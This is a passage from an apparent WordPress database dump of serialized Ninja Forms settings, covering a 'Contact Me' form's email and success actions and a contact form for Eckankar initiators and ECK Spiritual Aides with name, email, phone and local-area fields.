13:38:56\";s:16:\"processing_label\";s:10:\"Processing\";s:5:\"order\";s:1:\"5\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:44:\"submit_element_hover_styles_background-color\";s:0:\"\";s:34:\"submit_element_hover_styles_border\";s:0:\"\";s:40:\"submit_element_hover_styles_border-style\";s:0:\"\";s:40:\"submit_element_hover_styles_border-color\";s:0:\"\";s:33:\"submit_element_hover_styles_color\";s:0:\"\";s:34:\"submit_element_hover_styles_height\";s:0:\"\";s:33:\"submit_element_hover_styles_width\";s:0:\"\";s:37:\"submit_element_hover_styles_font-size\";s:0:\"\";s:34:\"submit_element_hover_styles_margin\";s:0:\"\";s:35:\"submit_element_hover_styles_padding\";s:0:\"\";s:35:\"submit_element_hover_styles_display\";s:0:\"\";s:33:\"submit_element_hover_styles_float\";s:0:\"\";s:45:\"submit_element_hover_styles_show_advanced_css\";s:1:\"0\";s:36:\"submit_element_hover_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3287\";}}}s:7:\"actions\";a:4:{i:0;a:2:{s:2:\"id\";i:1;s:8:\"settings\";a:25:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-07-15 13:38:57\";s:5:\"label\";s:16:\"Store Submission\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:13:\"email_message\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}}i:1;a:2:{s:2:\"id\";i:2;s:8:\"settings\";a:26:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-07-15 13:38:57\";s:5:\"label\";s:18:\"Email Confirmation\";s:2:\"to\";s:13:\"{field:email}\";s:7:\"subject\";s:24:\"This is an email action.\";s:7:\"message\";s:19:\"Hello, Ninja Forms!\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:24:\"Submission Confirmation \";s:13:\"email_message\";s:29:\"<p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}}i:2;a:2:{s:2:\"id\";i:3;s:8:\"settings\";a:24:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-07-15 13:38:57\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:5:\"label\";s:18:\"Email Notification\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:20:\"{system:admin_email}\";s:13:\"email_subject\";s:29:\"New message from {field:name}\";s:13:\"email_message\";s:60:\"<p>{field:message}</p><p>-{field:name} ( {field:email} )</p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:1:\"0\";s:19:\"email_message_plain\";s:0:\"\";}}i:3;a:2:{s:2:\"id\";i:4;s:8:\"settings\";a:27:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-07-15 13:38:57\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:47:\"Thank you {field:name} for filling out my form!\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:0:\"\";s:13:\"email_subject\";s:0:\"\";s:13:\"email_message\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:89:\"<p>Form submitted successfully.</p><p>A confirmation email was sent to {field:email}.</p>\";s:19:\"email_message_plain\";s:0:\"\";}}}s:8:\"settings\";a:99:{s:5:\"title\";s:10:\"Contact Me\";s:3:\"key\";s:0:\"\";s:10:\"created_at\";s:19:\"2019-07-15 13:38:56\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"conditions\";a:0:{}s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:0:\"\";s:10:\"show_title\";s:1:\"1\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:9:\"logged_in\";s:0:\"\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:4:{i:0;a:2:{s:5:\"order\";s:1:\"0\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:4:\"name\";}s:5:\"width\";s:3:\"100\";}}}i:1;a:2:{s:5:\"order\";s:1:\"1\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:5:\"email\";}s:5:\"width\";s:3:\"100\";}}}i:2;a:2:{s:5:\"order\";s:1:\"2\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:7:\"message\";}s:5:\"width\";s:3:\"100\";}}}i:3;a:2:{s:5:\"order\";s:1:\"3\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:6:\"submit\";}s:5:\"width\";s:3:\"100\";}}}}s:33:\"container_styles_background-color\";s:0:\"\";s:23:\"container_styles_border\";s:0:\"\";s:29:\"container_styles_border-style\";s:0:\"\";s:29:\"container_styles_border-color\";s:0:\"\";s:22:\"container_styles_color\";s:0:\"\";s:23:\"container_styles_height\";s:0:\"\";s:22:\"container_styles_width\";s:0:\"\";s:26:\"container_styles_font-size\";s:0:\"\";s:23:\"container_styles_margin\";s:0:\"\";s:24:\"container_styles_padding\";s:0:\"\";s:24:\"container_styles_display\";s:0:\"\";s:22:\"container_styles_float\";s:0:\"\";s:34:\"container_styles_show_advanced_css\";s:1:\"0\";s:25:\"container_styles_advanced\";s:0:\"\";s:29:\"title_styles_background-color\";s:0:\"\";s:19:\"title_styles_border\";s:0:\"\";s:25:\"title_styles_border-style\";s:0:\"\";s:25:\"title_styles_border-color\";s:0:\"\";s:18:\"title_styles_color\";s:0:\"\";s:19:\"title_styles_height\";s:0:\"\";s:18:\"title_styles_width\";s:0:\"\";s:22:\"title_styles_font-size\";s:0:\"\";s:19:\"title_styles_margin\";s:0:\"\";s:20:\"title_styles_padding\";s:0:\"\";s:20:\"title_styles_display\";s:0:\"\";s:18:\"title_styles_float\";s:0:\"\";s:30:\"title_styles_show_advanced_css\";s:1:\"0\";s:21:\"title_styles_advanced\";s:0:\"\";s:27:\"row_styles_background-color\";s:0:\"\";s:17:\"row_styles_border\";s:0:\"\";s:23:\"row_styles_border-style\";s:0:\"\";s:23:\"row_styles_border-color\";s:0:\"\";s:16:\"row_styles_color\";s:0:\"\";s:17:\"row_styles_height\";s:0:\"\";s:16:\"row_styles_width\";s:0:\"\";s:20:\"row_styles_font-size\";s:0:\"\";s:17:\"row_styles_margin\";s:0:\"\";s:18:\"row_styles_padding\";s:0:\"\";s:18:\"row_styles_display\";s:0:\"\";s:28:\"row_styles_show_advanced_css\";s:1:\"0\";s:19:\"row_styles_advanced\";s:0:\"\";s:31:\"row-odd_styles_background-color\";s:0:\"\";s:21:\"row-odd_styles_border\";s:0:\"\";s:27:\"row-odd_styles_border-style\";s:0:\"\";s:27:\"row-odd_styles_border-color\";s:0:\"\";s:20:\"row-odd_styles_color\";s:0:\"\";s:21:\"row-odd_styles_height\";s:0:\"\";s:20:\"row-odd_styles_width\";s:0:\"\";s:24:\"row-odd_styles_font-size\";s:0:\"\";s:21:\"row-odd_styles_margin\";s:0:\"\";s:22:\"row-odd_styles_padding\";s:0:\"\";s:22:\"row-odd_styles_display\";s:0:\"\";s:32:\"row-odd_styles_show_advanced_css\";s:1:\"0\";s:23:\"row-odd_styles_advanced\";s:0:\"\";s:35:\"success-msg_styles_background-color\";s:0:\"\";s:25:\"success-msg_styles_border\";s:0:\"\";s:31:\"success-msg_styles_border-style\";s:0:\"\";s:31:\"success-msg_styles_border-color\";s:0:\"\";s:24:\"success-msg_styles_color\";s:0:\"\";s:25:\"success-msg_styles_height\";s:0:\"\";s:24:\"success-msg_styles_width\";s:0:\"\";s:28:\"success-msg_styles_font-size\";s:0:\"\";s:25:\"success-msg_styles_margin\";s:0:\"\";s:26:\"success-msg_styles_padding\";s:0:\"\";s:26:\"success-msg_styles_display\";s:0:\"\";s:36:\"success-msg_styles_show_advanced_css\";s:1:\"0\";s:27:\"success-msg_styles_advanced\";s:0:\"\";s:33:\"error_msg_styles_background-color\";s:0:\"\";s:23:\"error_msg_styles_border\";s:0:\"\";s:29:\"error_msg_styles_border-style\";s:0:\"\";s:29:\"error_msg_styles_border-color\";s:0:\"\";s:22:\"error_msg_styles_color\";s:0:\"\";s:23:\"error_msg_styles_height\";s:0:\"\";s:22:\"error_msg_styles_width\";s:0:\"\";s:26:\"error_msg_styles_font-size\";s:0:\"\";s:23:\"error_msg_styles_margin\";s:0:\"\";s:24:\"error_msg_styles_padding\";s:0:\"\";s:24:\"error_msg_styles_display\";s:0:\"\";s:34:\"error_msg_styles_show_advanced_css\";s:1:\"0\";s:25:\"error_msg_styles_advanced\";s:0:\"\";}}',4,0x00),(2,'a:7:{s:2:\"id\";i:2;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:11:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:1249:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:1168:\"<p></p><p></p><p></p><h3><span style=\"color: #23507d;\"><strong>Loveland Initiator and ESA\'s</strong></span></h3><strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>\";s:3:\"key\";s:8:\"html_141\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_141\";}s:2:\"id\";i:5;}i:1;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_142\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_142\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:6;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_143\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_143\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:7;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_144\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_144\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:8;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"phone_145\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:9:\"phone_145\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:9;}i:5;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 